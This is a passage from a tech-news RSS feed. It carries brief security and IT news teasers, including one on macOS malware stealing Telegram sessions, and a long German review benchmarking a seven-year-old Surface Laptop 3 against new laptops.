<title><![CDATA[Hackers Don’t Crack Telegram 2FA—They Copy Your Already Logged-In Session]]></title>
<description><![CDATA[A macOS information-stealing malware is turning stolen Telegram desktop data into immediate account access. Instead of guessing passwords or breaking two-factor authentication, it copies the local files that prove a user has already logged in. When those files are restored on another Mac, Telegra...]]></description>
<link>https://tsecurity.de/de/3673406/it-security-nachrichten/hackers-dont-crack-telegram-2fa-they-copy-your-already-logged-in-session/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673406/it-security-nachrichten/hackers-dont-crack-telegram-2fa-they-copy-your-already-logged-in-session/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A macOS information-stealing malware is turning stolen Telegram desktop data into immediate account access. Instead of guessing passwords or breaking two-factor authentication, it copies the local files that prove a user has already logged in. When those files are restored on another Mac, Telegram can open and synchronize chats without showing its usual login screen. […]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-crack-telegram-2fa/">Hackers Don’t Crack Telegram 2FA—They Copy Your Already Logged-In Session</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Adds Support and Parental Notification for AI Chats About Self-Harm]]></title>
<description><![CDATA[Amid a period of intense scrutiny over safety, Meta is beefing up its options for parental supervision and notification of their child's online activities.]]></description>
<link>https://tsecurity.de/de/3673400/it-nachrichten/meta-adds-support-and-parental-notification-for-ai-chats-about-self-harm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673400/it-nachrichten/meta-adds-support-and-parental-notification-for-ai-chats-about-self-harm/</guid>
<pubDate>Thu, 16 Jul 2026 14:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amid a period of intense scrutiny over safety, Meta is beefing up its options for parental supervision and notification of their child's online activities.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Mehr KI-Energieeffizienz in Rechenzentren dank neuromorpher Chips]]></title>
<description><![CDATA[Neuromorphe Hardware soll den Energiebedarf in Rechenzentren senken, indem sie Informationen ereignisbasiert, parallel und geringerer Energie verarbeitet.]]></description>
<link>https://tsecurity.de/de/3673314/it-nachrichten/heise-mehr-ki-energieeffizienz-in-rechenzentren-dank-neuromorpher-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673314/it-nachrichten/heise-mehr-ki-energieeffizienz-in-rechenzentren-dank-neuromorpher-chips/</guid>
<pubDate>Thu, 16 Jul 2026 13:47:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Neuromorphe Hardware soll den Energiebedarf in Rechenzentren senken, indem sie Informationen ereignisbasiert, parallel und geringerer Energie verarbeitet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich habe 7 Jahre alten Laptop getestet – jetzt stelle ich die Upgrade-Zyklen bei PCs in Frage]]></title>
<description><![CDATA[Die erste Überraschung gab es bereits, bevor ich überhaupt einen Browser-Tab geöffnet hatte: Der sieben Jahre alte Microsoft Surface Laptop 3 startete schneller als die brandneuen Geräte, mit denen ich ihn hier vergleichen wollte. Die besten Notebooks aller Klassen finden Sie in unserem Vergleich...]]></description>
<link>https://tsecurity.de/de/3673098/it-nachrichten/ich-habe-7-jahre-alten-laptop-getestet-jetzt-stelle-ich-die-upgrade-zyklen-bei-pcs-in-frage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673098/it-nachrichten/ich-habe-7-jahre-alten-laptop-getestet-jetzt-stelle-ich-die-upgrade-zyklen-bei-pcs-in-frage/</guid>
<pubDate>Thu, 16 Jul 2026 12:32:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die erste Überraschung gab es bereits, bevor ich überhaupt einen Browser-Tab geöffnet hatte: Der sieben Jahre alte <a href="https://www.pcwelt.de/article/1183918/test-microsoft-surface-laptop3-notebook.html" target="_blank" rel="noreferrer noopener">Microsoft Surface Laptop 3</a> startete schneller als die brandneuen Geräte, mit denen ich ihn hier vergleichen wollte. <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen finden Sie in unserem Vergleichstest.</a></p>



<p>Das hätte eigentlich nicht passieren dürfen. Immer wenn den Herstellern nur wenig zu den Verbesserungen gegenüber der Vorgängergeneration einfällt, greifen sie zu einem bewährten Vergleich: Wie schneidet der neue PC im Vergleich zu einem fünf Jahre alten Modell ab?</p>



<p>Das ist eine sichere Wette. Egal, wie wenige Verbesserungen ein neuer Chip bietet, er wird immer besser sein als ein PC aus längst vergangenen Zeiten. Neu ist eben immer besser, oder? Normalerweise gilt dieser simple Grundsatz. Aber angesichts der angespannten Weltlage kann einem der Neukauf eines Computers schnell verhagelt werden. Daher stellt sich eine Frage: Kann man Geld sparen, wenn man einen älteren Laptop behält oder diesen gebraucht kauft? Und worauf muss man bei dieser Sparmaßnahme verzichten?</p>



<p>Ich habe dafür unsere Lager durchforstet und eine Sammlung neuer und älterer Laptops in unser Testlabor geschleppt. Mit diesem Versuch wollte ich herausfinden, ob die PC-Hersteller mit ihren Lobeshymnen auf neue Geräte tatsächlich die Wahrheit sagen.</p>



<p>Mit meinen Erkenntnissen will ich Ihnen weder einen neuen Laptop verkaufen noch mich dafür aussprechen, alte Geräte einfach weiterzuverwenden. Ich habe lediglich versucht, weitverbreitete Geräte unter verschiedenen Szenarien miteinander zu vergleichen. Dies soll die Vorteile von Neugeräten und älteren Modellen aufzeigen. Dabei habe ich mich auf die folgenden Punkte konzentriert: Boot-Zeit, die Zeit zum Exportieren einer PDF-Datei oder die Zeit für das Entpacken eines Archivs. Mit diesen Ergebnissen können Sie selbst entscheiden, ob Sie durch den Neukauf tatsächlich viel Zeit gewinnen werden.</p>



<p>Eigentlich wollte ich dafür Geräte nutzen, die maximal fünf Jahre alt sind. Doch ich konnte in unserem Lager nur einen wenig gebrauchten, sieben Jahre alten Laptop ausfindig machen: den <a href="https://www.pcwelt.de/article/1183918/test-microsoft-surface-laptop3-notebook.html" target="_blank" rel="noreferrer noopener">Microsoft Surface Laptop 3</a>. Dieses Gerät stammt noch aus Zeiten vor der Corona-Pandemie. Dieses Urgestein habe ich mit mehreren modernen Laptops verglichen: dem Asus ZenBook (UX3607OA) mit einem <a href="https://www.pcwelt.de/article/3123457/qualcomm-snapdragon-x2-elite-streaming-test.html" target="_blank" rel="noreferrer noopener">Snapdragon X2 Elite Extreme</a> und Windows auf ARM-Basis sowie mit dem Asus ZenBook Duo mit einem <a href="https://www.pcwelt.de/article/3042853/intel-panther-lake-cpu-core-ultra-x9-388h-test.html" target="_blank" rel="noreferrer noopener">Intel Core Ultra 300 (Panther Lake)</a> der Spitzenklasse. Beide sind erst in diesem Jahr auf den Markt gekommen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75d2ab"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Microsoft-Surface-Laptop-3-Core-Ice-Lake.png?w=1200" alt="Microsoft Surface Laptop 3 Core Ice Lake" class="wp-image-3142825" width="1200" height="940" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der Surface Laptop 3 wurde noch mit Windows 10 ausgeliefert, aber mittlerweile auf Windows 11 aktualisiert.</figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Es stellt sich die Frage: Können die neuen Modelle besser abschneiden? Lohnt sich dieser Vorsprung? Bilden Sie sich selbst ein Urteil.</p>



<h2 class="wp-block-heading toc">Der alte Laptop startet schneller</h2>



<p>Mein erster Test: die Startzeit. Die Ära der Festplatten liegt längst hinter uns. Die Geschwindigkeit des Hochfahrens hängt daher primär vom Tempo der verbauten SSD ab. Auch die Anzahl der Anwendungen, die beim Start geladen werden müssen, spielt eine Rolle.</p>



<p>Für diesen Test habe ich alle Startanwendungen deaktiviert. Ausnahmen galten lediglich für vorinstallierte Programme wie Asus Mouse Agent, Microsoft Defender, Edge, OneDrive und Teams. Damit die Ergebnisse vergleichbar bleiben, habe ich sonst genutzte Anwendungen wie mein VPN weggelassen. Daraufhin folgten fünf Neustarts, bei denen ich jeweils gemessen habe, wie lange es dauert, bis der Windows-Desktop vollständig geladen war. Auch die Anmeldung über Windows Hello wurde einbezogen.</p>



<p>Auf den meisten Laptops ist Microsoft Edge nicht im Autostart „vorinstalliert“. Dies kann man jedoch über das Einstellungsmenü von Microsoft Edge aktivieren. Dadurch startet der Browser deutlich schneller. Im Gegenzug verlängerte sich die Startzeit des Laptops aber um etwa drei Sekunden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75d9e2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_45e283.png?w=1200" alt="" class="wp-image-3141109" width="1200" height="521" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der ältere Laptop startete am schnellsten.</figcaption></figure></div>



<p>Die Ergebnisse meines Tests haben mich überrascht: Der Surface Laptop 3, auf dem eine Standardversion von Windows 11 24H2 (26100.8328) lief, startete deutlich schneller als die anderen vier Laptops. Warum auf einmal vier Laptops? Um meine Ergebnisse besser bewerten zu können, habe ich zwei etwas ältere Geräte hinzugefügt. Dabei stellte sich heraus, dass auch diese Geräte recht lange für den Startvorgang benötigten.</p>



<p>Kurz gesagt: Der Surface Laptop 3 aus dem Jahr 2019 startete etwa 10 Sekunden schneller als seine modernen Konkurrenten. Entsprechend gespannt war ich auf die weiteren Tests.</p>



<h2 class="wp-block-heading toc">Die alltägliche Windows-Nutzung</h2>



<p>Auch hier habe ich versucht, synthetische Benchmarks zu vermeiden. Diesen Zahlen fehlt oft der Bezug zur alltäglichen Nutzung. Stattdessen habe ich etwa 30 Tabs im Browser geöffnet und zwischen diesen hin und her geklickt. Ich habe außerdem mit allen drei Laptops gearbeitet und sogar Teile dieses Artikels auf den Geräten verfasst.</p>



<p>Subjektiv gesehen spürt man tatsächlich einen Unterschied. Der von mir getestete Surface Laptop 3 verfügt über 16 Gigabyte RAM. Das Hin- und Herwechseln sowie das Starten von Apps fühlten sich langsamer an als bei den modernen Laptops. Der Unterschied war aber nicht sehr groß. Auch das Starten von Apps oder die Interaktion mit Windows fühlten sich merklich verzögert an. Dennoch konnte ich damit gut leben.</p>



<p>Oft liegt die träge Reaktion einfach an niedrigeren Spezifikationen. So gab es den Surface Laptop 3 auch mit nur 8 Gigabyte RAM. Davon würde ich heute eher abraten. Die nur 256 Gigabyte kleine SSD hat mich ebenfalls vor Probleme gestellt. Schon der Versuch, Windows wieder sauber zurückzusetzen, scheiterte am fehlenden Speicherplatz. Doch ich hatte letztlich nur einige versteckte Videodateien übersehen.</p>



<p>Generell fordern die meisten Funktionen des Betriebssystems oft nur einen Kern des Prozessors. Diese Leistung habe ich mit Cinebench gemessen. Je niedriger der erreichte Wert ist, desto langsamer fühlt sich Windows im Alltag an.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75e0a2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_7e8877.png?w=1200" alt="" class="wp-image-3141110" width="1200" height="583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p>Auch hier fühlte sich die Interaktion mit Webseiten auf dem älteren Laptop etwas langsam und ruckelig an. Wirklich gestört hat mich dies aber nicht. </p>



<p>Ihr Browser verarbeitet im Hintergrund mehrere APIs, Frameworks und andere Anweisungen, die von außen kaum sichtbar sind. Um zu bewerten, wie gut der Laptop diese Aufgaben verarbeitet, haben wir zwei weitere Benchmarks durchgeführt: Speedometer und MotionMark sollen zeigen, wie flüssig der Browser arbeitet.</p>



<p>In diesem Fall rendern die neuen Laptops ihre Ergebnisse etwa doppelt so schnell wie der ältere Laptop. Subjektiv gesehen ist das kein riesiger Unterschied – aber es macht sich im Alltag bemerkbar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75e5f0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_0315c6.png?w=1200" alt="" class="wp-image-3141111" width="1200" height="713" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p>Diese abstrakten Zahlen sollen verdeutlichen, welche Unterschiede es zwischen den Geräten gibt. Viel nützlicher sind aber die folgenden Vergleiche aus dem Alltag.</p>



<h2 class="wp-block-heading toc">Büroarbeit offenbart Schwächen</h2>



<p>Die Anwendungen PCMark und Procyon von UL messen die Leistung in Word, Excel oder PowerPoint und nutzen das klassische Outlook für einige zusätzliche Tests im Office-Produktivitäts-Benchmark. Das Ergebnis ist eine Punktzahl, die ich in der folgenden Tabelle aufgelistet habe. Es wird jedoch auch die tatsächliche Zeit erfasst, die für bestimmte Aufgaben benötigt wird. So zeichnen sich die tatsächlichen Unterschiede zwischen den älteren und neueren Laptops deutlicher ab. Die durchschnittliche Punktzahl des Surface Laptop 3 war nur etwa halb so hoch wie die des Asus ZenBook Duo und des Asus ZenBook mit Snapdragon-X2E-Prozessor.</p>



<p>Die Grafik unten offenbart jedoch den eigentlichen Grund, warum ich diesen Artikel überhaupt geschrieben habe: Der Procyon-Benchmark von UL misst tatsächlich die Zeit, die für das Erledigen einer bestimmten Aufgabe nötig war. Der Test liefert so einen realistischen Vergleich darüber, wie schnell die jeweilige Laptop-Generation wirklich war.</p>



<p>Einige Aufgaben waren schnell erledigt: Können Sie es in Kauf nehmen, dass das Hinzufügen eines Wasserzeichens auf dem alten Laptop 0,9 Sekunden dauert, gegenüber 0,36 Sekunden beim neuen Gerät? Wahrscheinlich. Wie sieht es mit 2 Sekunden anstelle von einer Sekunde für das Hinzufügen eines Bildes aus? Und wie wäre es mit 26 Sekunden zum Exportieren einer PDF-Datei, gegenüber 11 Sekunden? Überlegen Sie, wie oft Sie diese Aufgaben ausführen und wie lange Sie auf das Ergebnis warten müssten.</p>



<p>Ein Blick auf Excel: Das Formatieren einer Tabelle dauerte auf dem Surface Laptop 3 fast drei Sekunden, gegenüber 0,4 Sekunden beim Asus-Laptop mit Snapdragon-Prozessor. Wenn Sie regelmäßig in Excel arbeiten, könnte diese kleine Verzögerung stören. Oder vier Sekunden zum Kopieren und Einfügen gegenüber sieben? Manche Menschen werden sich daran stören. Andere nicht.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75ec26"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Procyon-Office-test-7-year-old-PC-all-threee.png?w=1115" alt="Seven-year-old PC Panther Lake v Snapdragon X2 Elite and Surface Laptop 3" class="wp-image-3141114" width="1115" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Procyons Office-Produktivitäts-Benchmark mit einzelnen Ergebnissen. </figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading toc">Videoanrufe, 30 Browser-Tabs und die Grenzen alter Hardware</h2>



<p>Außerdem habe ich einen weiteren Benchmark durchgeführt, den neuen Essentials-Test von UL.</p>



<p>Essentials öffnet einen Video-Chat, lässt diesen dann über einen Browser mit 30 geöffneten Tabs laufen – und beginnt anschließend, verschiedene Apps zu öffnen und Aufgaben auszuführen. Dies entspricht einem typischen Arbeitsalltag. Dazu kommen Aufgaben wie das Komprimieren und Dekomprimieren von Dateien, das Navigieren in einem webbasierten CRM (Customer Relationship Management) sowie die Nutzung sozialer Medien.</p>



<p>Wie zuvor geht es darum, herauszufinden, ob diese Unterschiede im Alltag einen Unterschied machen. Wenn Sie darüber nachdenken, Ihrem alten Laptop die Treue zu halten, dann stellen Sie sich folgende Fragen: Werden Sie wirklich 30 Tabs gleichzeitig öffnen? Wenn ja, könnte dies ein Problem sein. Anstelle von 5,75 Sekunden für die Navigation in einem Online-CRM geht es auf einem neuen Gerät mit 1,2 Sekunden deutlich flotter. Unser Testlauf umfasst sogar einige KI-Aufgaben: Das Zusammenfassen eines Chats dauerte auf dem älteren Laptop satte 69 Sekunden, gegenüber 15 bis 18 Sekunden auf den neueren Modellen mit integrierten NPUs. Ist dies etwas, das Sie regelmäßig tun? Das Entpacken einer ZIP-Datei war auf einem neuen PC etwa fünfmal schneller geschafft. So etwas macht man aber auch nicht ständig.</p>



<h2 class="wp-block-heading toc">Erwarten Sie keine Wunder von der integrierten Grafikeinheit</h2>



<p>Ich habe Grafikfunktionen wie Gaming, Foto- und Videobearbeitung bewusst ausgelassen. Dieser Artikel wurde mit Blick auf Produktivität verfasst, und die beiden letztgenannten Kategorien sind nach wie vor eher spezialisierte Aufgaben. Wenn Sie jedoch die Grafikleistung beider Laptop-Generationen vergleichen, stellen moderne Laptops ihre Vorgänger deutlich in den Schatten. Das Asus ZenBook Duo bietet etwa die siebenfache Grafikleistung (7.666 gegenüber 990 Punkten im 3DMark Time Spy-Benchmark von UL). Und selbst ein Asus Vivobook S14 aus dem Jahr 2024 bietet mit einer Punktzahl von 4.209 die vierfache Performance.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75f40b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/7-year-old-laptop-Procyon-Essentials.png?w=1200" alt="7-year-old laptop Procyon Essentials" class="wp-image-3141116" width="1200" height="1018" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die Ergebnisse des Procyons Essentials-Benchmarks.</figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading toc">Die Akkulaufzeit ist offensichtlichster Grund für ein Upgrade</h2>



<p>Leider gibt es einen Bereich, in dem moderne Laptops einen erheblichen Vorteil gegenüber ihren älteren Kollegen bieten. Das ist die Akkulaufzeit.</p>



<p>Ich bin nicht überzeugt, dass sich ein moderner Laptop physisch so sehr von einem älteren Thin-and-Light-Modell unterscheidet. Moderne Laptops werden aus unterschiedlichen Materialien hergestellt – von leichteren bis hin zu strukturell robusteren –, doch die Gewichtsersparnis beträgt meist nur 500 Gramm.</p>



<p>Die Hersteller haben die Möglichkeit, diesen Platz mit zusätzlichen Akkuzellen zu füllen. Dadurch ist die Akkukapazität moderner Laptops in den vergangenen Jahren gestiegen. Ein Laptop wie das Asus ZenBook Duo enthält sowohl einen effizienten Panther-Lake-Chip als auch einen satten 99-Wattstunden-Akku.</p>



<p>Während die Akkulaufzeit des Surface Laptop 3 bei für die damalige Zeit soliden 10 Stunden lag, hielt das ZenBook Duo beachtliche 22 Stunden und 15 Minuten durch.</p>



<p>Und es kommt noch schlimmer. Akkus altern, daher hat der 45-Wattstunden-Akku im Surface Laptop 3 laut Windows in den vergangenen Jahren 70 Ladezyklen durchlaufen. Das hat die tatsächliche Kapazität bei voller Ladung auf 36,7 Wattstunden gesenkt, was einem Rückgang von 18 Prozent entspricht. So erreicht das Gerät nur noch eine geschätzte Laufzeit von 8 Stunden und 12 Minuten. Das ist gar nicht schlecht! Dennoch werden Sie bei der Arbeit nicht einen ganzen Tag lang mit diesem Akku auskommen. In unserem Ratgeber erklären wir Ihnen, <a href="https://www.pcwelt.de/article/1140340/laptop-richtig-laden-diese-fehler-sollten-sie-vermeiden.html" target="_blank" rel="noreferrer noopener">wie Sie Ihren Laptop richtig aufladen</a>, um dessen Kapazität so lange wie möglich zu erhalten.</p>



<p>Dennoch hat sich der Alltag in den letzten sieben Jahren stark verändert. <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Leistungsstarke Powerbanks</a> sind zur Massenware geworden. Ebenso sind Steckdosen in Flugzeugen, auf Flughäfen und in Konferenzzentren überall zu finden. Die Effizienz von Akkus hat sich ebenfalls weiterentwickelt.</p>



<h2 class="wp-block-heading toc">Sollten Sie Ihren alten Laptop ausmustern?</h2>



<p>Die Kurzform: Wenn Ihr älterer Laptop die täglich genutzten Apps noch schnell laden kann, das Gerät generell reaktionsschnell arbeitet, genug Akkuleistung für Ihren Arbeitsalltag bietet und noch genügend Speicherplatz zur Verfügung hat, dann müssen Sie das Gerät wahrscheinlich noch nicht ersetzen.</p>



<p>Ein neuer Laptop ist vor allem dann sinnvoll, wenn die Akkulaufzeit zu einem täglichen Problem wird. Auch wenn Sie regelmäßig bei rechenintensiven Aufgaben wie Fotobearbeitung, Videobearbeitung, KI-Tools, großen Tabellenkalkulationen oder Dateikomprimierung warten müssen. Oder aber Ihr Gerät stößt aufgrund von zu wenig RAM oder Speicherplatz an seine Grenzen. Für einfaches Surfen, Office-Arbeit, E-Mails, Videoanrufe und leichtes Multitasking kann ein gut gepflegter älterer Laptop immer noch gut genug sein – und ihn zu behalten, könnte die klügere Entscheidung sein.</p>



<h2 class="wp-block-heading toc">Widerstehen Sie den Versuchungen des Marketings</h2>



<p>Früher waren sechs oder sieben Jahre in der PC-Branche eine kleine Ewigkeit. 1989 brachte Intel den 486er mit 25 Megahertz auf den Markt; 1995 erreichte der Pentium Pro 200 Megahertz. Und heute? Noch vor etwa einem Jahr haben wir uns darüber beschwert, dass Intels aktuelle Arrow-Lake-Chips mit einer Taktfrequenz von bis zu 5,2 Gigahertz sogar weniger Leistung ablieferten als ihre Vorgänger.</p>



<p>Vielleicht haben Sie diesen Artikel gelesen und sich gedacht: Wen interessiert das schon? Eine halbe Sekunde macht im Alltag keinen Unterschied. Daher rate ich Ihnen: Ziehen Sie es in Betracht, Ihren alten Rechner zu behalten. Andere Nutzer sehen das vielleicht anders und konzentrieren sich auf all die Vorteile, die ein neuerer Laptop mit sich bringt.</p>



<p>Die IT-Branche möchte Ihnen aus verschiedenen Gründen neue Produkte verkaufen. Wenn Sie aber die Möglichkeit haben, einen alten und einen neuen Laptop zu vergleichen, dann sehen Sie schnell, ob sich eine Neuanschaffung lohnt. Genau darum ging es mir in diesem Artikel: Ich wollte Ihnen all die Informationen geben, die Sie benötigen, um eine klügere Entscheidung darüber zu treffen, ob Sie einen neuen Laptop kaufen sollten.</p>



